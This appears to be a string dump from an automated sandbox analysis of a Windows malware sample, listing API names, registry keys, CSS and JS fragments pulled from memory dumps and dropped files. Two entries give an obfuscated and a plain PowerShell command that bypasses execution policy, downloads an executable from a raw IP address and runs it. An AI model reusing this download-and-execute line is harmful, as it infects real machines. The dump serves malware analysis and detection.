Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetStdHandle

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetSysColor

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetSystemDirectoryW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetSystemMenu

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetSystemMetrics

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetSystemTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetTempFileNameW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetTempPathW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetThreadGroupAffinity

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetTickCount

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetTimeFormatW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetUserDefaultLCID

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetUserDefaultUILanguage

Ansi based on Dropped File (Roaming.exE.1622950302)

GetVDMCurrentDirectories

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVersion

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVolumeInformationW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVolumePathNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetWindowLongW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetWindowRect

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetWindowsDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GlobalAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GlobalFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GlobalLock

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GlobalSize

Ansi based on Dropped File (System.dll.469766707)

GlobalUnlock

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

HasNavigationEnum

Unicode based on Runtime Data (exE )

HeapAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapReAlloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapSetInformation

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HeapSize

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

height: 13px;

Ansi based on Dropped File (ie179663103.css)

height: 20px;

Ansi based on Dropped File (ext.default.css)

height: 28px;

Ansi based on Dropped File (ie179663103.css)

height: 5px;

Ansi based on Dropped File (ext.default.css)

height: 7px;

Ansi based on Dropped File (ext.default.css)

height: auto;

Ansi based on Dropped File (ie179663103.css)

HH:mm:ss t

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Hidden

Unicode based on Runtime Data (exE )

HideFileExt

Unicode based on Runtime Data (exE )

HideFolderVerbs

Unicode based on Runtime Data (exE )

HideIcons

Unicode based on Runtime Data (exE )

HideInWebView

Unicode based on Runtime Data (exE )

HideOnDesktopPerUser

Unicode based on Runtime Data (exE )

HIGHESTNUMANODENUMBER

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ication

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IconsOnly

Unicode based on Runtime Data (exE )

IF /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IHDR

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

ImageList_AddMasked

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ImageList_Create

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

ImageList_Destroy

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

img.alignleft {

Ansi based on Dropped File (ie179663103.css)

img.alignright {

Ansi based on Dropped File (ie179663103.css)

InfoTip

Unicode based on Runtime Data (exE )

InitFolderHandler

Unicode based on Runtime Data (exE )

InitializeCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InitializeProcThreadAttributeList

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InitiateShutdownW

Ansi based on Dropped File (Roaming.exE.1622950302)

InprocServer32

Unicode based on Runtime Data (exE )

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

Int64Op

Ansi based on Dropped File (System.dll.469766707)

InterlockedCompareExchange

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InterlockedExchange

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

InvalidateRect

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

IsDebuggerPresent

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IsShortcut

Unicode based on Runtime Data (exE )

iswalpha

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswdigit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

IsWindow

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

IsWindowEnabled

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

IsWindowVisible

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

iswspace

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

iswxdigit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

it20W

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

JS_ConfirmErase: 'Erase this record?',

Ansi based on Dropped File (lang-en.js)

JS_InvalidInput: 'Please check input of marked fields! Cannot save while input is invalid!',

Ansi based on Dropped File (lang-en.js)

JS_SaveChanges: 'Do you want to save changed data?',

Ansi based on Dropped File (lang-en.js)

JS_SaveIncChildForm: 'Save changed data in subforms or cancel operation?',

Ansi based on Dropped File (lang-en.js)

JS_SaveRecord: 'Save this record?',

Ansi based on Dropped File (lang-en.js)

JS_WaitUntilFinished: 'Please wait until current submit finishes!'});

Ansi based on Dropped File (lang-en.js)

k has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

KERNEL32

Ansi based on Dropped File (Roaming.exE.1622950302)

KERNEL32.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

KERNEL32.DLL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LdapClientIntegrity

Unicode based on Runtime Data (exE )

LeaveCriticalSection

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

left: 0;

Ansi based on Dropped File (ext.default.css)

left: 100%;

Ansi based on Dropped File (ie179663103.css)

left: 10em;

Ansi based on Dropped File (ext.default.css)

left: 12px;

Ansi based on Dropped File (ext.default.css)

left: 15px;

Ansi based on Dropped File (ext.default.css)

left: 187px !important;

Ansi based on Dropped File (ext.default.css)

left: 191px;

Ansi based on Dropped File (ext.default.css)

left: auto;

Ansi based on Dropped File (ie179663103.css)

library_tolerance=2500,

Ansi based on Dropped File (unternehmen.jsp)

lication></compatibility></assembly>

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

line-height: 1.0;

Ansi based on Dropped File (ext.default.css)

line-height: 1;

Ansi based on Dropped File (ie179663103.css)

line-height: 20px;

Ansi based on Dropped File (ext.default.css)

Links

Unicode based on Runtime Data (exE )

list-style: none;

Ansi based on Dropped File (ext.default.css)

list-style:none;

Ansi based on Dropped File (ext.default.css)

LoadAppInit_DLLs

Unicode based on Runtime Data (cmd.exe )

LoadBitmapW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

LoadCursorW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

LoadImageW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

LoadLibraryA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

LoadLibraryExA

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LoadLibraryExW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

LoadLibraryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Local

Unicode based on Runtime Data (cmd.exe )

LocalFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LocalizedName

Unicode based on Runtime Data (exE )

LocalRedirectOnly

Unicode based on Runtime Data (exE )

longjmp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LookupPrivilegeValueW

Ansi based on Dropped File (Roaming.exE.1622950302)

lstrcatW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrcmpiW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

lstrcmpW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

lstrcpyA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrcpynW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrcpyW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrlenA

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

lstrlenW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

MachinePreferredUILanguages

Unicode based on Runtime Data (cmd.exe )

MapNetDriveVerbs

Unicode based on Runtime Data (exE )

MapNetDrvBtn

Unicode based on Runtime Data (exE )

margin-bottom: 0;

Ansi based on Dropped File (ie179663103.css)

margin-left: -7px;

Ansi based on Dropped File (ie179663103.css)

margin-left: 0;

Ansi based on Dropped File (ie179663103.css)

margin-right: 0;

Ansi based on Dropped File (ie179663103.css)

margin-right: 60px;

Ansi based on Dropped File (ie179663103.css)

margin: 0 0 1px 0;

Ansi based on Dropped File (ext.default.css)

margin: 0;

Ansi based on Dropped File (ext.default.css)

MartaExtension

Unicode based on Runtime Data (exE )

max-width: 1040px;

Ansi based on Dropped File (ie179663103.css)

max-width: 604px;

Ansi based on Dropped File (ie179663103.css)

max-width: 724px;

Ansi based on Dropped File (ie179663103.css)

max-width: 930px;

Ansi based on Dropped File (ie179663103.css)

max-width: none;

Ansi based on Dropped File (ie179663103.css)

MaxRpcSize

Unicode based on Runtime Data (exE )

MaxSxSHashCount

Unicode based on Runtime Data (exE )

memcpy

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

memmove

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

memset

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MessageBoxIndirectW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

min-height: 74px;

Ansi based on Dropped File (ext.default.css)

min-height: auto;

Ansi based on Dropped File (ext.default.css)

min-width: 1040px;

Ansi based on Dropped File (ie179663103.css)

mkdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MM/dd/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MoveFileExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MoveFileW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

mpletionChar

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MPR.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MS Shell Dlg

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

msctls_progress32

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

MSPEC

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

msvcrt.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

MulDiv

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

MultiByteToWideChar

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Music

Unicode based on Runtime Data (exE )

My Pictures

Unicode based on Runtime Data (exE )

My Video

Unicode based on Runtime Data (exE )

NCCheck

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NeedCurrentDirectoryForExePathW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NeverShowExt

Unicode based on Runtime Data (exE )

nInfoSizeW

Ansi based on Dropped File (Roaming.exE.1622950302)

NoFileFolderJunction

Unicode based on Runtime Data (exE )

NoNetCrawling

Unicode based on Runtime Data (exE )

NORMAL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

nsf7D51.tmp

Unicode based on Runtime Data (exE )

NSIS Error

Unicode based on Dropped File (Roaming.exE.1622950302)

NtClose

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NTDLL.DLL

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ntdll.dll

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtFsControlFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtOpenProcessToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtOpenThreadToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtQueryInformationProcess

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtQueryInformationToken

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtSetInformationProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Null environment

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ole32.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

OleInitialize

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

OleUninitialize

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

OOBEInProgress

Unicode based on Runtime Data (exE )

OpenClipboard

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

OpenProcessToken

Ansi based on Dropped File (Roaming.exE.1622950302)

OpenThread

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Operating System

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

outline: 0;

Ansi based on Dropped File (ie179663103.css)

overflow: visible;

Ansi based on Dropped File (ie179663103.css)

P^o^W^er^Sh^e^ll.^exe -exEc^UtIonP^o^lI^Cy bYpaS^S -^NoPrOF^ILe (^N^E^W-ob^jEcT systeM.NET.wEB^clIE^nT).DoWnLO^a^d^Fil^e^('http://46.30.43.107/gite.exe','%APPDATA%\exE')^;^s^TA^r^t^-P^R^o^c^eSs^ C:\Users\%USERNAME%\AppData\Roaming.exE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

padding-left: 60px;

Ansi based on Dropped File (ie179663103.css)

padding-right: 150px;

Ansi based on Dropped File (ie179663103.css)

padding-top: 6px;

Ansi based on Dropped File (ie179663103.css)

padding: 0 0 10px;

Ansi based on Dropped File (ie179663103.css)

padding: 0.5em 1em 0.3em;

Ansi based on Dropped File (ext.default.css)

padding: 0;

Ansi based on Dropped File (ext.default.css)

padding: 12px 0;

Ansi based on Dropped File (ext.default.css)

padding: 27px 1em;

Ansi based on Dropped File (ext.default.css)

padding: 5px 0 8px;

Ansi based on Dropped File (ie179663103.css)

PageAllocatorSystemHeapIsPrivate

Unicode based on Runtime Data (exE )

PageAllocatorUseSystemHeap

Unicode based on Runtime Data (exE )

PARATE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ParentFolder

Unicode based on Runtime Data (exE )

ParsingName

Unicode based on Runtime Data (exE )

PathCompletionChar

Unicode based on Runtime Data (cmd.exe )

PATHEXT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PAYLOAD

Ansi based on Image Processing (screen_0.png)

PeekMessageW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Pictures

Unicode based on Runtime Data (exE )

PinToNameSpaceTree

Unicode based on Runtime Data (exE )

position: absolute;

Ansi based on Dropped File (ext.default.css)

position: relative;

Ansi based on Dropped File (ext.default.css)

PostQuitMessage

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

PoWerShell.exe

Unicode based on Runtime Data (cmd.exe )

PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE

Ansi based on Process Commandline (powershell.exe)

PoWerShell.exe"*

Unicode based on Runtime Data (cmd.exe )

pqacG%%apppppppaB

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

PreCreate

Unicode based on Runtime Data (exE )

PreferExternalManifest

Unicode based on Runtime Data (cmd.exe )

PreferredUILanguages

Unicode based on Runtime Data (exE )

printf

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ProfileImagePath

Unicode based on Runtime Data (exE )

PROMPT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

PSPUBWS

Unicode based on Runtime Data (cmd.exe )

PublishExpandedPath

Unicode based on Runtime Data (exE )

pushd

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

qsort

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

QueryForInfoTip

Unicode based on Runtime Data (exE )

QueryForOverlay

Unicode based on Runtime Data (exE )

QueryFullProcessImageNameW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

QueryPerformanceCounter

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RANDOM

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadConsoleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadFile

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ReadProcessMemory

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

realloc

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

REALTIME

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Redir:

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegCloseKey

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegCreateKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteKeyW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegDeleteValueW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegEnumKeyW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegEnumValueW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegisterClassW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegQueryValueExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegSetValueExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RelativePath

Unicode based on Runtime Data (exE )

ReleaseDC

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

REM /?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

REM/?

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RemoveDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RestrictedAttributes

Unicode based on Runtime Data (exE )

ResumeThread

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RichEd20

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

RichEd32

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

RichEdit

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

RichEdit20W

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

ription

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

RLEVEL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

RMDIR

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

rmdir

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Roamable

Unicode based on Runtime Data (exE )

RtlDosPathNameToNtPathName_U

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlFindLeastSignificantBit

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlFreeHeap

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RtlNtStatusToDosError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

s valid.

Unicode based on Dropped File (Roaming.exE.1622950302)

SafeDllSearchMode

Unicode based on Runtime Data (cmd.exe )

Saved Games

Unicode based on Runtime Data (exE )

ScreenToClient

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SCRIPT

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

ScrollConsoleScreenBufferW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Se%ae`

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Searches

Unicode based on Runtime Data (exE )

SearchPathW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Security

Unicode based on Runtime Data (exE )

SelectObject

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SendMessageTimeoutW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SendMessageW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SEPARATE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

SeparateProcess

Unicode based on Runtime Data (exE )

SeShutdownPrivilege

Unicode based on Dropped File (Roaming.exE.1622950302)

SetBkColor

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetBkMode

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetClassLongW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetClipboardData

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

SetConsoleCtrlHandler

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleCursorPosition

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleInputExeNameW

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleMode

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleTextAttribute

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetConsoleTitleW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetCurrentDirectoryW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetCursor

